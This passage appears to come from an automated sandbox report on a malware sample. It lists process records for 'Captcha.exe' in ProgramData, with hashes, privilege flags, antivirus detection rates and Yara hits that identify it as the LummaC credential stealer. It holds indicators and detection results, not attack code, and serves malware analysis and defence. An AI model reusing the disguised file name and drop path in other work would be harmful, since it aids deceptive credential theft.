                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:12
                                                                                                                              Start time:07:22:01
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\ProgramData\Captcha.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\ProgramData\Captcha.exe"
                                                                                                                              Imagebase:0x500000
                                                                                                                              File size:2'142'592 bytes
                                                                                                                              MD5 hash:05B7F29D1BAEAC0A7513D094BFC12A92
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2319031426.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2319503961.0000000001632000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000003.1835568834.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 39%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Target ID:15
                                                                                                                              Start time:07:22:40
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\ProgramData\Captcha.exe
                                                                                                                              Wow64 process (32bit):
                                                                                                                              Commandline:none
                                                                                                                              Imagebase:
                                                                                                                              File size:2'142'592 bytes
                                                                                                                              MD5 hash:05B7F29D1BAEAC0A7513D094BFC12A92
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false
